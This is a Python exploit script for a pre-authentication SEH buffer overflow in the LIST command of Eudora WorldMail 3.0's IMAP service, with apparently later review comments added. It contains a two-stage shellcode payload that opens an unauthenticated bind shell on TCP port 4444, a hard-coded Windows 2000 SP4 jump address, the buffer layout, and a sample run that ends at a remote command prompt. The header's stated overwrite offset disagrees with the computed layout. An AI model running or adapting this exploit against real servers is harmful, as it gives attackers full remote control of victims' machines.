
# Title : Eudora Qualcomm WorldMail 3.0 (IMAPd) Remote Overflow Exploit
# Published : 2005-12-20
# Author : muts


#!/usr/bin/python
###################################################################################
#
# PRE AUTHENTICATION Eudora Qualcomm WorldMail 3.0 IMAPd Service 6.1.19.0 Overflow.
#
# Discovered by  Tim Shelton - security-advisories@acs-inc.com
#
# Coded by mati@see-security.com
#
# Details:
# * SEH gets overwritten at 970 bytes in the LIST command (author's figure;
#   the buffer assembled below places the handler address at offset 774 of the
#   payload, i.e. 784 bytes after the start of "a001 LIST " -- re-verify the
#   offset against a real target before relying on either number).
# * No space for shellcode, so 1st stage shellcode is used to
#   jump back 768 bytes into the bindshell (2nd stage) shellcode.
#
# Thanks:
# * My wife - for putting up with my obsessions
#                FOR EDUCATION PURPOSES ONLY!
###################################################################################
# root@muts:/tmp# ./test.py 192.168.1.162
#
# Eudora Qualcomm WorldMail 3.0 IMAPd Service 6.1.19.0 Overflow.
#
# Discovered by  Tim Shelton - security-advisories@acs-inc.com
# Coded by mati@see-security.com
#
# [+] Connecting
# [+] * OK  WorldMail IMAP4 Server 6.1.19.0 ready
# [+] Look Maa - No authentication!
# [+] Sending evil buffer...
# [+] Done
#
# [+] Connect to port 4444 on victim IP - Muhahaha!
#
# root@muts:/tmp# nc -vn 192.168.1.162 4444
# (UNKNOWN) [192.168.1.162] 4444 (krb524) open
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
#
# C:\WINNT\system32>
#############################################################################

import sys
import struct
import socket
from time import sleep

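def banner():
    """Print the exploit banner (title, discoverer, author) to stdout.

    The listing's "\\n" escapes had been stripped ("nEudora ... Overflow.n");
    they are restored here so the banner prints on its own lines instead of
    with stray "n" characters glued to the text. print() with a single
    argument is valid in both Python 2 and 3.
    """
    print("\nEudora Qualcomm WorldMail 3.0 IMAPd Service 6.1.19.0 Overflow.\n")
    print("Discovered by  Tim Shelton - security-advisories@acs-inc.com")
    print("Coded by mati@see-security.com\n")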
 
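# Argument check: exactly <ip> <port>. A usage error now exits non-zero so a
# wrapper can tell "never ran" from "ran and returned"; the original exited 0.
if len(sys.argv) != 3:
    banner()
    print("Usage: eudora-imap-LIST.py <ip> <port>\n")
    sys.exit(1)

# TCP client socket for the IMAP service. The connect happens further down,
# once the payload has been assembled.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)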

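# Using Msf::Encoder::PexFnstenvMov with final size of 42 bytes
# First Stage Shellcode
#
# Small fnstenv-based XOR decoder stub. It is what the hijacked SEH handler
# ends up executing; per the file header its job is to jump back ~768 bytes
# into the NOP sled in front of the second stage (sc4).
#
# The published listing had every "\" escape stripped ("x6a" for "\x6a"),
# which turns this into a 126-character ASCII string. The escapes are
# restored here so the literal is the 42-byte stub the encoder comment
# describes.
sc3  = "\x6a\x05\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x2f\x77\x28"
sc3 += "\x4b\x83\xeb\xfc\xe2\xf4\xf6\x99\xf1\x3f\x0b\x83\x71\xcb\xee\x7d"
sc3 += "\xb8\xb5\xe2\x89\xe5\xb5\xe2\x88\xc9\x4b"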

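# win32_bind -  EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum http://metasploit.com */
# Second Stage Shellcode
#
# Metasploit win32_bind, PexAlphaNum-encoded: after a 10-byte GetPC prologue
# the rest of the blob is printable alphanumerics. It opens a shell listener
# on TCP/4444 on the victim with no authentication of its own, so anyone who
# can reach that port gets the shell, not only the attacker. EXITFUNC=seh
# means the payload unwinds through the exception handler instead of
# terminating the IMAP process outright.
#
# As with sc3, the published listing had its "\" escapes stripped, leaving a
# 2127-character ASCII string instead of the 709-byte payload the Size=709
# line refers to. The escapes are restored below; len(sc4) must be 709 for
# the offsets in the buffer layout to hold.
sc4  = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
sc4 += "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
sc4 += "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
sc4 += "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
sc4 += "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x56\x4b\x4e"
sc4 += "\x4d\x54\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x38"
sc4 += "\x4e\x36\x46\x32\x46\x52\x4b\x58\x45\x54\x4e\x53\x4b\x38\x4e\x37"
sc4 += "\x45\x50\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x34\x4a\x31\x4b\x48"
sc4 += "\x4f\x35\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x33\x4b\x58"
sc4 += "\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x38\x42\x4c"
sc4 += "\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e"
sc4 += "\x46\x4f\x4b\x33\x46\x35\x46\x52\x4a\x32\x45\x37\x45\x4e\x4b\x48"
sc4 += "\x4f\x35\x46\x32\x41\x50\x4b\x4e\x48\x36\x4b\x38\x4e\x50\x4b\x34"
sc4 += "\x4b\x38\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x43\x30\x4e\x32\x4b\x38"
sc4 += "\x49\x48\x4e\x36\x46\x32\x4e\x41\x41\x36\x43\x4c\x41\x53\x4b\x4d"
sc4 += "\x46\x56\x4b\x58\x43\x54\x42\x53\x4b\x48\x42\x34\x4e\x50\x4b\x58"
sc4 += "\x42\x37\x4e\x41\x4d\x4a\x4b\x58\x42\x44\x4a\x30\x50\x55\x4a\x46"
sc4 += "\x50\x38\x50\x44\x50\x50\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x56"
sc4 += "\x43\x55\x48\x56\x4a\x46\x43\x53\x44\x53\x4a\x56\x47\x37\x43\x57"
sc4 += "\x44\x43\x4f\x45\x46\x45\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e"
sc4 += "\x4e\x4f\x4b\x43\x42\x35\x4f\x4f\x48\x4d\x4f\x45\x49\x38\x45\x4e"
sc4 += "\x48\x36\x41\x38\x4d\x4e\x4a\x30\x44\x50\x45\x55\x4c\x36\x44\x30"
sc4 += "\x4f\x4f\x42\x4d\x4a\x56\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x55"
sc4 += "\x4f\x4f\x48\x4d\x43\x55\x43\x45\x43\x45\x43\x45\x43\x45\x43\x44"
sc4 += "\x43\x45\x43\x44\x43\x55\x4f\x4f\x42\x4d\x48\x36\x4a\x56\x41\x31"
sc4 += "\x4e\x55\x48\x46\x43\x45\x49\x48\x41\x4e\x45\x49\x4a\x46\x46\x4a"
sc4 += "\x4c\x51\x42\x57\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x4c\x36\x42\x31"
sc4 += "\x41\x35\x45\x45\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x42"
sc4 += "\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x45\x45\x35\x4f\x4f\x42\x4d"
sc4 += "\x4a\x36\x45\x4e\x49\x54\x48\x48\x49\x54\x47\x55\x4f\x4f\x48\x4d"
sc4 += "\x42\x35\x46\x45\x46\x55\x45\x45\x4f\x4f\x42\x4d\x43\x49\x4a\x46"
sc4 += "\x47\x4e\x49\x37\x48\x4c\x49\x37\x47\x35\x4f\x4f\x48\x4d\x45\x55"
sc4 += "\x4f\x4f\x42\x4d\x48\x36\x4c\x56\x46\x36\x48\x46\x4a\x36\x43\x56"
sc4 += "\x4d\x56\x49\x58\x45\x4e\x4c\x56\x42\x45\x49\x35\x49\x32\x4e\x4c"
sc4 += "\x49\x38\x47\x4e\x4c\x36\x46\x54\x49\x38\x44\x4e\x41\x33\x42\x4c"
sc4 += "\x43\x4f\x4c\x4a\x50\x4f\x44\x44\x4d\x52\x50\x4f\x44\x34\x4e\x32"
sc4 += "\x43\x59\x4d\x58\x4c\x57\x4a\x53\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x36"
sc4 += "\x44\x57\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x57\x46\x44\x4f\x4f"
sc4 += "\x48\x4d\x4b\x55\x47\x55\x44\x55\x41\x55\x41\x45\x41\x35\x4c\x46"
sc4 += "\x41\x30\x41\x35\x41\x45\x45\x55\x41\x55\x4f\x4f\x42\x4d\x4a\x56"
sc4 += "\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x36"
sc4 += "\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f\x42\x4d\x4b\x38\x47\x55\x4e\x4f"
sc4 += "\x43\x58\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x45\x4f\x4f\x42\x4d"
sc4 += "\x4a\x46\x42\x4f\x4c\x58\x46\x30\x4f\x35\x43\x35\x4f\x4f\x48\x4d"
sc4 += "\x4f\x4f\x42\x4d\x5a"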

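# Win2k SP4 JMP EBX - 0x77E1CCF7
# Hard-coded, build-specific gadget address: this only lands on a target whose
# system DLLs match Windows 2000 SP4. Other versions / service packs place the
# instruction elsewhere and the overwritten handler will just crash the service.
SEH_HANDLER = '\xf7\xcc\xe1\x77'   # 0x77E1CCF7, little-endian
NEXT_SEH = '\xeb\x06\x06\xeb'      # short jmp +6 over the handler address, padded to 4 bytes


def build_evil_buffer(stage1, stage2, nseh=NEXT_SEH, handler=SEH_HANDLER):
    """Assemble the LIST argument that overwrites the SEH record.

    Layout (offsets relative to the returned string, for the shellcode sizes
    this file ships: stage2 = 709 bytes, stage1 = 42 bytes):

        0    61 x NOP sled
        61   stage2  (bindshell, 709 bytes)
        770  nseh    (short jmp +6: skips over the handler address)
        774  handler (JMP EBX in Win2k SP4)
        778  8 x NOP
        786  stage1  (42-byte jump-back decoder stub)
        828  400 x '}' filler

    NOTE(review): the file header says SEH is overwritten "at 970 bytes"; with
    the lengths above the handler sits at offset 774 of this buffer (784 bytes
    after the start of the "a001 LIST " command). Re-verify on a target before
    trusting either figure. No size validation is done: a second stage of a
    different length shifts every later offset and breaks the stage1 jump-back
    distance the header describes.

    stage1/stage2 are raw byte strings (Python 2 str). Returns the payload as
    one str; nothing is sent here.
    """
    return ('\x90' * 61 + stage2 + nseh + handler + '\x90' * 8
            + stage1 + '}' * 400)


buffer = build_evil_buffer(sc3, sc4)
banner()

# Bound every blocking call so a filtered port or a silent server cannot hang
# the script forever.
s.settimeout(10)
try:
    s.connect((sys.argv[1], int(sys.argv[2])))
except (socket.error, ValueError):
    # socket.error: refused/unreachable/timeout; ValueError: non-numeric port.
    # The original bare `except:` would also have swallowed KeyboardInterrupt.
    print("Can't connect to server!\n")
    sys.exit(1)
try:
    print("[+] Connecting")
    data = s.recv(1024)
    print("[+] " + data.rstrip())
    print("[+] Look Maa - No authentication!")
    print("[+] Sending evil buffer...")
    # sendall() keeps writing until the whole payload is on the wire; send()
    # may transmit only a prefix, leaving the SEH record untouched.
    s.sendall('a001 LIST ' + buffer + '\r\n')
except socket.error as e:
    print("[-] Socket error while talking to the server: %s\n" % e)
    sys.exit(1)
finally:
    s.close()
print("[+] Done\n")
# The bind shell on 4444 accepts any client; it is not tied to this host.
print("[+] Connect to port 4444 on victim IP - Muhahaha!\n")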
